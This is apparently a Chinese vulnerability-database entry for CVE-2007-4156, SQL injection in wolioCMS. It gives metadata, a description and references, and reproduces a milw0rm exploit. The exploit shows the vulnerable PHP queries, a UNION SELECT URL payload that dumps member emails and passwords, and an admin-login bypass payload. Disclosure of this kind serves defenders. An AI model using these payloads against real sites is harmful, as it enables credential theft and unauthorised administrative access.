WolioCMS 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113402 漏洞类型 SQL注入
发布时间 2007-07-30 更新时间 2007-08-06
CVE编号 CVE-2007-4156 CNNVD-ID CNNVD-200708-018
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/4246
https://cxsecurity.com/issue/WLB-2007080024
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-018
|漏洞详情
wolioCMS中存在多个SQL注入漏洞。远程攻击者可以借助(1)一个页操作中对member.php的id参数,且与common.php的SELECT状态相关;以及(2)loginid参数(uid自变量),及可能的(3)对admin/index.php的pwd参数,执行任意SQL指令。
|漏洞EXP
########################################################################
# wolioCMS - SQL Injection and Bypass Administrator Login
# Vendor        : http://www.buton.web.id/member.php?member=anon
# Download      : http://www.buton.web.id/download/woliocms.zip
# Found By      : k1tk4t - k1tk4t[4t]newhack.org
# Location      : Indonesia   --  #newhack[dot]org @irc.dal.net
########################################################################
Exploit ini berhasil jika 'magic_quotes_gpc = off'
########################################################################
file;
/common.php
bug at line73;
$sql="select * from pages where pages_id='".$_GET["id"]."' ";
----
/admin/index.php
bug at line28;
$sql="select * from member where member_email='$uid' and member_password='$pwd' and member_active='yes' ";
Variable $uid tidak terfilter dengan baik, sehingga bisa di manipulasi oleh user
########################################################################
exploit;
SQL Injection
http://localhost/_woliocms/member.php?member=admin&act=page&id='/**/UNION/**/ALL/**/SELECT/**/null,null,concat(member_email,'-',member_password),null,null,null,null,null,null,null/**/FROM/**/member/*
----
Bypass Administrator Login
http://localhost/_woliocms/admin/
Login Page
Email;
'/**/UNION/**/ALL/**/SELECT/**/member_id,member_email,member_password,member_realname,member_urlname,member_themes,member_groups_id,member_register_date,member_active,member_activation_code/**/FROM/**/member/*
Password;
Blank[just kliklogin]
########################################################################
Thanks;
str0ke
xoron [www.xoron.biz]
y3dips [y3d1ps.blogspot.com]
-newhack[dot]org|staff-
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------
all member newhack[ot]org
-----------------------
all member echo.or.id
-----------------------
tidak lupa untuk anavrin[semangat kerja bro], dan ical yang baru sembuh

# milw0rm.com [2007-07-30]
|参考资料

来源:XF
名称:woliocms-member-sql-injection(35678)
链接:http://xforce.iss.net/xforce/xfdb/35678
来源:BID
名称:25134
链接:http://www.securityfocus.com/bid/25134
来源:BUGTRAQ
名称:20070730wolioCMSSQLInjection
链接:http://www.securityfocus.com/archive/1/archive/1/475068/100/0/threaded
来源:MILW0RM
名称:4246
链接:http://www.milw0rm.com/exploits/4246
来源:SECUNIA
名称:26270
链接:http://secunia.com/advisories/26270
来源:VUPEN
名称:ADV-2007-2726
链接:http://www.frsirt.com/english/advisories/2007/2726
来源:SREASON
名称:2956
链接:http://securityreason.com/securityalert/2956